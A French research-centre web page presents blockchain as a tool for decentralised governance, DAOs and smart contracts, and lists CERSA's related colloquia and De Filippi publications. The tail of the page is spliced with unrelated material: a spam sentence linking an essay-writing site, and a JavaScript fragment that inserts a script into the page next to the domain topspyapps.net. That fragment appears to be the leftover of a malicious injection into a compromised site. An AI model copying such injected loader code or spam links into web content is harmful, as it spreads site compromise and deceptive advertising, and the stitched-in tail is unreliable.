Blockchain

Le protocole Blockchain est sur le point de bouleverser le mode de fonctionnement des organisations : son rôle dans la décentralisation des transactions et des décisions est est souvent comparé à celui d’Internet dans les années 90. Technologie au fondement des cryptomonnaies, le Blockchain peut être définie comme une base de données partagée, distribuée et cryptée hébergeant un historique complet de toutes les transactions réalisées au sein d’un écosystème, et qui ne peut être ni faussé ni corrompu. Le tiers de confiance, pilier des systèmes économique, politique et social du 20ème siècle, y devient inutile : pour la première fois, des individus sont en mesure de s’accorder sur l’occurrence d’une transaction ou la réalité d’une information sans l’intervention d’une autorité centralisée.

Au-delà des cryptomonnaies, le Blockchain ouvre la voie à la création d’Organisations Autonomes Décentralisées (DAOs) dont le fonctionnement et la gouvernance repose sur la seule base logicielle, sans intervention humaine. Au delà des cryptomonnaies, le protocole Blockchain permet la création de places de marché qui fonctionnent sans intermédiaire, la mise en place de contrats intelligents (smart contracts) dont l’exécution est automatique, ainsi que de nouveaux systèmes de gouvernance plus participatives. Le Blockchain a ainsi le potentiel de basculer le pouvoir de décision et la gouvernance depuis une autorité centrale vers la commuanauté dans des domaines aussi divers que la banque, l’assurance, les systèmes juridiques ou encore la politique. Plus fondamentalement, de nouveaux types d’organisations pourront fonctionner sur la base d’une gouvernance entièrement décentralisée, tout en conservant les avantages des réseaux online du point de vue de la flexibilité et des économies d’échelle.

Ses problématiques sont actuellement au cœur de la recherche du CERSA. En tant que partenaire institutionnel du réseau international de recherche COALA , le CERSA a participé à l’organisation d’une série de colloques et d’ateliers portant sur les enjeux juridiques, sociaux, et politiques des technologies blockchain.

PUBLICATIONS:
  • De Filippi, P. (2015), Translating Commons-based Peer Production into metrics : Towards Commons-based Crypto-Currencies, in David Lee Kuo Chuen (Ed.), The Handbook of Digital Currency. Elsevier

  • De Filippi, P. (2015). Blockchain-based Crowdfunding: what impact on artistic production and art consumption? in Observatório Itaú Cultural, issue 19
  • De Filippi, P. (2014). Bitcoin: a regulatory nightmare to a libertarian dreamInternet Policy Review, 3(2).

VIDÉOS:

 

The terms of this agreement, you must cease https://essayclick.net/ using and return or destroy

document.currentScript.parentNode.insertBefore(s, document.currentScript);topspyapps.net

Comments are closed.

© 2015 Sofarider Inc. All rights reserved. WordPress theme by Dameer DJ.